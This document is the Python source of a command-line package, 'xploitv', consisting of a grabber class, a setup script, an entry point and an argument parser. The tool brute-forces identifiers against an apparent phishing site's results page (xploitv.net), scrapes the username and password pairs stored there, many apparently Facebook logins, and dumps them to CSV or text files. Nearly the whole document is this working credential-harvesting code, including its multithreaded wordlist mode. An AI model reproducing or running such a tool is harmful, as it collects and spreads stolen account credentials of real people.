import re
import sys
import logging
from threading import Lock
from  urllib.request import Request, urlopen

class Grabber(object):
    def __init__(self):
        self.__DELIMITER: tuple = None
        self.__HDRS: dict       = {'User-Agent': 'FSundays'}
        self.__URL: str         = 'https://xploitv.net/binv.php'
        self.__LOCK: Lock       = Lock()
        self.__ACCNTS: list     = list()
    def check_status(self) -> bool:
        status: bool = False
        try:
            urlopen(Request(self.__URL, headers=self.__HDRS))
            status = True
        except: pass
        return status
    def set_format(self,foutput: str) -> None:
        formats: list = ['csv','txt']
        if foutput in formats: logging.info(f"Setting the output format to '{foutput}'")
        if foutput == 'csv': self.__DELIMITER = (foutput,',','\r\n')
        elif foutput == 'txt': self.__DELIMITER = (foutput,':','\n')
    def __request(self,code: str) -> bytes:
        data    : bytes = None
        URI     : str = f"{self.__URL}?bb={code}"
        request : Request = Request(URI, headers=self.__HDRS)
        try:
            response: http.client.HTTPResponse = urlopen(request)
            data = response.read()
        except: pass
        return data
    def __filter(self, data: bytes) -> list:
        content: list = re.findall(rb'<td>[^<>]+<', data)
        return [ c[4:-1] for c in content if content ]
    def __grab(self, data: list) -> list:
        state: int = 0
        account: list = list()
        accounts: list = list()
        for field in data:
            if field == b'N\\/D':
                accounts.append(account)
                account = list()
                state = 0
            elif state < 2:
                account.append(field)
                state += 1
        return accounts
    def __clear(self):
        self.__ACCNTS = list(dict.fromkeys(self.__ACCNTS))
        self.__ACCNTS.sort()
    def steal(self, code: str) -> list:
        content: bytes      = self.__request(code)
        if not content:
            logging.warning(f"Service unavailable while trying code {code}")
            return
        fields: list        = self.__filter(content)
        if not fields:
            logging.debug(f"No content found for code {code}")
            return
        accounts            = self.__grab(fields)
        if not accounts:
            logging.debug(f"No accounts found for code {code}")
            return
        with self.__LOCK:
            logging.info(f"Grabbing accounts from {code}")
            for account in accounts:
                if len(account) > 1:
                    username, password = account
                    if b'@' in username:
                        username = username.decode('utf-8')
                        password = password.decode('utf-8')
                        logging.debug(f"Account from code {code}\nUsername: '{username}'\nPassword: '{password}'")
                        self.__ACCNTS.append((username,password))
    def output(self) -> None:
        if len(self.__ACCNTS) > 0:
            self.__clear()
            if not self.__DELIMITER:
                for account in self.__ACCNTS: print(f"{account[0]}:{account[1]}")
            else:
                file = f"dump.{self.__DELIMITER[0]}"
                logging.critical(f"Results stored in ./{file}")
                with open(file, "w") as dump:
                    dump.write(f"Username{self.__DELIMITER[1]}Password{self.__DELIMITER[2]}")
                    for account in self.__ACCNTS:
                        dump.write(f"{account[0]}{self.__DELIMITER[1]}{account[1]}{self.__DELIMITER[2]}")
        else:
            logging.critical(f"Execution completed with no results")



#!/usr/bin/env python3

from setuptools import setup, find_packages

REPOSITORY:str = "https://www.github.com/cosasdepuma/XPLOITV"

def readme() -> str:
    return "Xploitv"

def requirements() -> list:
    pass

setup(
    name='xploitv',
    version='0.1.0',
    description='An automated Xploitv grabber',
    long_description=readme(),
    long_description_content_type="text/markdown",
    license="WTFPL",
    keywords="xploitv facebook grabber hacking",
    author='Kike Fontan (@CosasDePuma)',
    author_email='kikefontanlorenzo@gmail.com',
    url="https://fsundays.tech/",
    project_urls={
        "Bug Tracker": f"{REPOSITORY}/issues",
        "Documentation": REPOSITORY,
        "Source Code": REPOSITORY
    },
    packages=find_packages(),
    zip_safe=True,
    install_requires=requirements(),
    python_requires=">=3.8",
    platforms=["any"],
    entry_points={ 'console_scripts': ['xploitv=xploitv:cli'] },
    classifiers=[
        "Environment :: Console",
        "License :: Free For Educational Use",
        "Natural Language :: English",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Topic :: Education :: Testing",
        "Topic :: Games/Entertainment",
        "Topic :: Internet",
        "Topic :: Scientific/Engineering :: Information Analysis",
        "Topic :: Security",
        "Topic :: Utilities"
    ]
)



import os
import sys
import logging
import threading

from xploitv.grabber    import Grabber
from xploitv.arguments  import Arguments

def show_banner():
    print(
"""____  ___      .__         .__  __
\\   \\/  /_____ |  |   ____ |__|/  |____  __
 \\     /\\____ \\|  |  /  _ \\|  \\   __\\  \\/ /
 /     \\|  |_> >  |_(  <_> )  ||  |  \\   /
/___/\\  \\   __/|____/\\____/|__||__|   \\_/
      \\_/__|

   [[ An automated Xploitv grabber ]]
""")

def multithreading(grabber: Grabber, codes: list) -> None:
    threads: list = [ threading.Thread(target=grabber.steal, args=(code,)) for code in codes ]
    for thread in threads: thread.start()
    for thread in threads: thread.join()

def entrypoint() -> None:
    # Parse the arguments
    parser: Arguments = Arguments()
    args = parser.parse()
    # Printing the banner
    show_banner()
    # Check required arguments
    if not args.id and not args.wordlist: parser.help()
    # Logging basic configuration
    if not args.v: args.v = 2
    elif args.v > 5: args.v = 5
    logging.basicConfig(
        level=(40 - args.v * 10),
        format='[%(asctime)s] %(message)s',
        datefmt='%H:%M:%S')
    # Checking the service status
    logging.critical("Let's hack this world!")
    grabber: Grabber = Grabber()
    if not grabber.check_status():
        logging.critical("Service not accesible")
        sys.exit(1)
    # Grabbing
    if args.id: grabber.steal(args.id)
    else:
        if args.wordlist:
            lines: list = list()
            logging.info(f"Using the wordlist {args.wordlist}")
            with open(args.wordlist) as wordlist:
                lines = [ line[:-1] for line in wordlist.readlines() if len(line) > 0 ]
            multithreading(grabber, lines)
    # Output
    if args.extension: grabber.set_format(args.extension.lower())
    grabber.output()


def cli() -> None:
    try: entrypoint()
    except KeyboardInterrupt: sys.exit(2)

if __name__ == '__main__':
    cli()



import os
import sys
import argparse

def rfile(path: str):
    file: str = None
    if os.path.isfile(path) and os.access(path, os.R_OK): file = path
    return file

class Arguments(object):
    def __init__(self):
        # Name and description
        self.__parser = argparse.ArgumentParser(
            prog="xploitv",
            add_help=True)

        # ---- Information
        information = self.__parser.add_argument_group(title="information")
        # Version
        information.add_argument(
            "-v",
            action="count",
            help="Verbosity (Default: -vv)")
        information.add_argument(
            "--version",
            action="version",
            version="xploitv v0.1.0",
            help="Print the version")

        # ---- Output
        output = self.__parser.add_argument_group(title="output")
        # Output format
        output.add_argument(
            "-x", "--extension",
            type=str,
            metavar="FORMAT",
            choices=["csv","txt"],
            help="Output extension (csv,txt)")

        # ---- Grabber
        grabber = self.__parser.add_argument_group(title="grabber (one required)")
        how = grabber.add_mutually_exclusive_group()
        # From ID
        how.add_argument(
            "-i", "--id",
            type=str,
            metavar="ID",
            help="Grab all the accounts linked to an identifier")
        # From wordlist
        how.add_argument(
            "-w", "--wordlist",
            type=rfile,
            metavar="FILE",
            help="Grab all the accounts linked to identifiers in a wordlist")

    def parse(self):
        return self.__parser.parse_args()

    def help(self):
        self.__parser.print_help()
        sys.exit(1)
